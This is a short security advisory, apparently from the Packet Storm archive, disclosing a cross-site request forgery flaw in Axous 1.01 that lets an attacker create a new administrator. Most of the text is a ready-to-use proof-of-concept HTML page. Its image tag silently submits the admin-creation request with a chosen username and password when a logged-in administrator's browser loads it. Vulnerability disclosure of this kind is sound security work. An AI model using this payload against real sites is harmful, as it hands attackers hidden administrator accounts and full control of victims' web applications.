AutoSec ToolsPACKETSTORM:93957
`<!------------------------------------------------------------------------
# Software................Axous 1.01
# Vulnerability...........Cross-site Request Forgery
# Download................http://www.axous.com/
# Release Date............9/16/2010
# Tested On...............Windows Vista + XAMPP
# ------------------------------------------------------------------------
# Author..................John Leitch
# Site....................http://www.johnleitch.net/
# [email protected]
# ------------------------------------------------------------------------
#
# --Description--
#
# A cross-site request forgery vulnerability in Axous 1.01 can be
# exploited to create a new admin.
#
#
# --PoC-->
<html>
<body>
<img src="http://localhost/axous/admin/administrators_add.php?user_name=new_admin&new_passwd=Password1&new_passwd1=Password1&email=test%40test.com&dosubmit=1&id=&action=addnew" />
</body>
</html>
`